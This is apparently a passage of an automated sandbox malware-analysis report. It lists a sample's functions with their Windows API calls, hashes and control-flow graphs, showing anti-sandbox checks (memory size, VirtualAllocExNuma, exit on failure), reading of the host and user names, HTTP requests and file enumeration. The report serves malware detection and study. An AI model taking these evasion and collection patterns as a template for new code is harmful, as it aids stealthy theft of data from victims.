                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: f8aeec727ea35323bc2438b55043311d348b2a591ae3f29e0c019392a75a85bc
                        • Instruction ID: b2ac8746abec9c3a0b36b4b412a04d40ee02600b40f68ea85f37072edad41b27
                        • Opcode Fuzzy Hash: f8aeec727ea35323bc2438b55043311d348b2a591ae3f29e0c019392a75a85bc
                        • Instruction Fuzzy Hash: 8631EF7190010EABDB08F7A0DC5AABE7B78BF94380F104528F356A6191DFB85505C6A7
                        Function 005E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1204 5e1220-5e1247 call 5f89b0 GlobalMemoryStatusEx 1207 5e1249-5e1271 call 5fda00 * 2 1204->1207 1208 5e1273-5e127a 1204->1208 1210 5e1281-5e1285 1207->1210 1208->1210 1212 5e129a-5e129d 1210->1212 1213 5e1287 1210->1213 1215 5e1289-5e1290 1213->1215 1216 5e1292-5e1294 ExitProcess 1213->1216 1215->1212 1215->1216
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005E123E
                        • __aulldiv.LIBCMT ref: 005E1258
                        • __aulldiv.LIBCMT ref: 005E1266
                        • ExitProcess.KERNEL32 ref: 005E1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: f906acb599eef16b9b914eb555925a22ae31820c99eb63ada60597542948eabf
                        • Instruction ID: 89e1cb7471259b8bee99a0c70813307d8736d7ca0e5e751b36d81fc72423e7b3
                        • Opcode Fuzzy Hash: f906acb599eef16b9b914eb555925a22ae31820c99eb63ada60597542948eabf
                        • Instruction Fuzzy Hash: 16014BB0940348ABEB14DBE2CC49BAEBF78BB54701F208048E745B62C0D6B85645879D
                        Function 005F6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1218 5f6af3 1219 5f6b0a 1218->1219 1221 5f6b0c-5f6b22 call 5f6920 call 5f5b10 CloseHandle ExitProcess 1219->1221 1222 5f6aba-5f6ad7 call 5faad0 OpenEventA 1219->1222 1228 5f6ad9-5f6af1 call 5faad0 CreateEventA 1222->1228 1229 5f6af5-5f6b04 CloseHandle Sleep 1222->1229 1228->1221 1229->1219
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005F6AF9
                        • Sleep.KERNEL32(00001770), ref: 005F6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6B1A
                        • ExitProcess.KERNEL32 ref: 005F6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 9a8322d3521da019dcb2411dd857bb06f81512dbdf4779539cae18b8fd57b5e0
                        • Instruction ID: 1ca50cb4de0ba6e2d6b2a79e958aab2d150a7dfcdc092e24f74d5ab97277c4ef
                        • Opcode Fuzzy Hash: 9a8322d3521da019dcb2411dd857bb06f81512dbdf4779539cae18b8fd57b5e0
                        • Instruction Fuzzy Hash: 1CF03470A4020EAFE720ABA09C0ABBE7E74FF14701F108914B753A21C1DBB85541DAA6
                        Function 005E47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 025ee46ed91c21370a1cdb1d2ca12b9e5dfa9989dce48e09f360e437982e1668
                        • Instruction ID: 723a96a422f63bd63571047264b2fd9b4411449ac7e7c42f0b05d9c7db1e9a3e
                        • Opcode Fuzzy Hash: 025ee46ed91c21370a1cdb1d2ca12b9e5dfa9989dce48e09f360e437982e1668
                        • Instruction Fuzzy Hash: 412142B1D00209ABDF14DFA4E849ADD7B74FF44310F108625F559A72C1DB706605CF92
                        Function 005F51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E6280: InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                          • Part of subcall function 005E6280: StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                          • Part of subcall function 005E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                          • Part of subcall function 005E6280: HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                          • Part of subcall function 005E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                          • Part of subcall function 005E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9f70e631c66d8f1639f6baf99024e9b8c244140345d8bef5c9ff9a9b082b7238
                        • Instruction ID: ea4a61f22ca0bd2861b335c8df4dbe5328fb301449c88483c71223ae66e30972
                        • Opcode Fuzzy Hash: 9f70e631c66d8f1639f6baf99024e9b8c244140345d8bef5c9ff9a9b082b7238
                        • Instruction Fuzzy Hash: 91110D7090014DA7CB18FB60DD5AAFD7B38BF90340F408554FA4A5B192EF786B0ACA92
                        Function 005F78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1275 5f78e0-5f7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 5f7939-5f793e 1275->1276 1277 5f7942-5f7945 1275->1277 1278 5f7962-5f7972 1276->1278 1277->1278
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 77c44ac890269bfc04f07a561f521cd3a41925f5cf675eb4a54b491afbe90bcf
                        • Instruction ID: 5206a68af0426deb1e581ace0478f078ec88d71068519d5e8dcf9f33a7fe29ad
                        • Opcode Fuzzy Hash: 77c44ac890269bfc04f07a561f521cd3a41925f5cf675eb4a54b491afbe90bcf
                        • Instruction Fuzzy Hash: 3F0186B1A4420DEBC714DF94DD45BAABFB8FB04B11F104629FA45E3280C77959008BA1
                        Function 005E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005E112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 005E1132
                        • ExitProcess.KERNEL32 ref: 005E1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: d0e10257454c9029c33c7db6d7671a6efa15a4bcae5ad78692cf36b528475271
                        • Instruction ID: 9ec55e9e82c877b183cc7c5f478f68f7b2e68d4dc98c818d761c800400e19896
                        • Opcode Fuzzy Hash: d0e10257454c9029c33c7db6d7671a6efa15a4bcae5ad78692cf36b528475271
                        • Instruction Fuzzy Hash: 33E0E67094534CFFE7286BA19C0EB0D7A78BF04B01F104054F709B65D0D6B52641969D
                        Function 005E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005E10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005E10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: ee9233c8fc46ccd175b3b3a086024c79a2848dfdcf7311edc4fc21c91aa4ec29
                        • Instruction ID: fadc9ee828cd8eb57cf842239879d97c916076d7c09d0129a95602be8245c7f3
                        • Opcode Fuzzy Hash: ee9233c8fc46ccd175b3b3a086024c79a2848dfdcf7311edc4fc21c91aa4ec29
                        • Instruction Fuzzy Hash: B2F0E271641218BBEB189BA4AC4DFBABBECF705B15F304448F644E3280D5719F00CAA4
                        Function 005E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                          • Part of subcall function 005F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                          • Part of subcall function 005F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                          • Part of subcall function 005F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                          • Part of subcall function 005F7850: RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                          • Part of subcall function 005F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                        • ExitProcess.KERNEL32 ref: 005E11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 0fcbe2047f251695f35b284895b8f8942ece71bd74ed49b8121494d4963d9c9d
                        • Instruction ID: f24d556a0ccdcb6618b449364c4f3185d0c7976f6f4f6ef44e64370448654ec9
                        • Opcode Fuzzy Hash: 0fcbe2047f251695f35b284895b8f8942ece71bd74ed49b8121494d4963d9c9d
                        • Instruction Fuzzy Hash: 18E0C2B190030E13CE1C33F1AC0EB3A3A8CBF54385F080424FB44C2202FA29E811C56A
                        Function 008424E3 Relevance: 1.3, APIs: 1, Instructions: 26memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000), ref: 00843074
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 838a9c9cd2ca84db14763c639598d3e2137dcade305ce95389c669e180124e02
                        • Instruction ID: 11d076018bd0abc138802a1d6661ad651f50c35a733ac664e3101aa47252ac15
                        • Opcode Fuzzy Hash: 838a9c9cd2ca84db14763c639598d3e2137dcade305ce95389c669e180124e02
                        • Instruction Fuzzy Hash: 06F039B045C70CDFD3007F589C407BEB7A8FB08309F21461DAAC286200EB305A50AA57

                        Non-executed Functions

                        Function 005F38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005F38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 005F38E3
                        • lstrcat.KERNEL32(?,?), ref: 005F3935
                        • StrCmpCA.SHLWAPI(?,00600F70), ref: 005F3947
                        • StrCmpCA.SHLWAPI(?,00600F74), ref: 005F395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005F3C67
                        • FindClose.KERNEL32(000000FF), ref: 005F3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
